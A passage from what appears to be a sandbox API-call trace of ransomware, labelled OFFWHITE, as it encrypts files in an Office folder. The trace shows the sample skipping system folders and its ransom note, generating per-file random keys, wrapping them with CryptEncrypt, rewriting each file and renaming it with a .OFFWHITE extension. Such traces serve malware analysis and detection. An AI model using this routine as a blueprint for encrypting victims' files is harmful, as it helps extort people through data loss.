(lpString1="ONINTL.REST.trx_dll", lpString2="rsa") returned -1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="programdata") returned -1 [0145.699] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="appdata") returned 1 [0145.700] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="program files") returned -1 [0145.700] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="program files (x86)") returned -1 [0145.700] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.700] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="ONINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" [0145.700] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.700] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.700] PathFindExtensionW (pszPath="ONINTL.REST.trx_dll") returned=".trx_dll" [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.700] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.700] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.701] GetProcessHeap () returned 0x500000 [0145.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e08 [0145.701] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.701] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=252256) returned 1 [0145.701] GetProcessHeap () returned 0x500000 [0145.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.701] GetProcessHeap () returned 0x500000 [0145.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.701] GetProcessHeap () returned 0x500000 [0145.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.701] GetProcessHeap () returned 0x500000 [0145.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.701] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.701] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.702] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.702] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.702] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.702] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.702] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.702] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.702] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.702] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.702] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.702] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.702] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3d960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.703] SetLastError (dwErrCode=0x0) [0145.703] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.706] GetLastError () returned 0x0 [0145.706] GetLastError () returned 0x0 [0145.706] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3da60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.706] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.706] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3db60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.706] WriteFile (in: hFile=0x218, lpBuffer=0x546e08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e08*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.706] GetProcessHeap () returned 0x500000 [0145.706] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3d960) returned 0x5607c8 [0145.706] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.706] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3d960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3d960, lpOverlapped=0x0) returned 1 [0145.724] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.724] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3d960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3d960, lpOverlapped=0x0) returned 1 [0145.725] GetProcessHeap () returned 0x500000 [0145.725] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.725] CloseHandle (hObject=0x218) returned 1 [0145.725] GetProcessHeap () returned 0x500000 [0145.725] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.725] GetProcessHeap () returned 0x500000 [0145.725] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.725] GetProcessHeap () returned 0x500000 [0145.725] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.725] GetProcessHeap () returned 0x500000 [0145.725] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.725] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" [0145.725] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.OFFWHITE" [0145.725] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.offwhite")) returned 1 [0145.726] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x35960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0145.726] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".") returned 1 [0145.726] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="..") returned 1 [0145.726] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="...") returned 1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="windows") returned -1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="rsa") returned -1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="programdata") returned -1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="appdata") returned 1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="program files") returned -1 [0145.727] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.727] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.727] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="OUTLLIBR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" [0145.727] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.727] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.727] PathFindExtensionW (pszPath="OUTLLIBR.DLL.trx_dll") returned=".trx_dll" [0145.727] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.727] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.727] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.727] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.728] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.728] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.728] GetProcessHeap () returned 0x500000 [0145.728] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e18 [0145.728] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.729] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=219488) returned 1 [0145.729] GetProcessHeap () returned 0x500000 [0145.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.729] GetProcessHeap () returned 0x500000 [0145.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.729] GetProcessHeap () returned 0x500000 [0145.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.729] GetProcessHeap () returned 0x500000 [0145.729] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.729] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.729] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.729] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.729] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.729] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.729] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.729] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.729] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.729] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.730] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.730] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.730] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.730] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x35960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.730] SetLastError (dwErrCode=0x0) [0145.730] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.733] GetLastError () returned 0x0 [0145.733] GetLastError () returned 0x0 [0145.733] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x35a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.733] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.734] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x35b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.734] WriteFile (in: hFile=0x218, lpBuffer=0x546e18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e18*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.734] GetProcessHeap () returned 0x500000 [0145.734] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x35960) returned 0x5607c8 [0145.734] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.734] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x35960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x35960, lpOverlapped=0x0) returned 1 [0145.754] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.754] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x35960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x35960, lpOverlapped=0x0) returned 1 [0145.755] GetProcessHeap () returned 0x500000 [0145.755] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.755] CloseHandle (hObject=0x218) returned 1 [0145.756] GetProcessHeap () returned 0x500000 [0145.756] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.756] GetProcessHeap () returned 0x500000 [0145.756] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.756] GetProcessHeap () returned 0x500000 [0145.756] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.756] GetProcessHeap () returned 0x500000 [0145.756] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.756] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" [0145.756] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.OFFWHITE" [0145.756] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.offwhite")) returned 1 [0145.757] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x9f560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".") returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="..") returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="...") returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="windows") returned -1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="rsa") returned -1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="programdata") returned -1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="appdata") returned 1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="program files") returned -1 [0145.757] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="program files (x86)") returned -1 [0145.757] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.757] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="OUTLLIBR.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" [0145.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.758] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.758] PathFindExtensionW (pszPath="OUTLLIBR.REST.trx_dll") returned=".trx_dll" [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.758] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.761] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.761] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.761] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.761] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.761] GetProcessHeap () returned 0x500000 [0145.761] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e28 [0145.761] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.761] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=652640) returned 1 [0145.761] GetProcessHeap () returned 0x500000 [0145.761] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.761] GetProcessHeap () returned 0x500000 [0145.762] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.762] GetProcessHeap () returned 0x500000 [0145.762] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.762] GetProcessHeap () returned 0x500000 [0145.762] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.762] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.762] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.762] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.762] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.762] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.762] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.762] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.762] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.762] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.762] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.762] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.762] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, 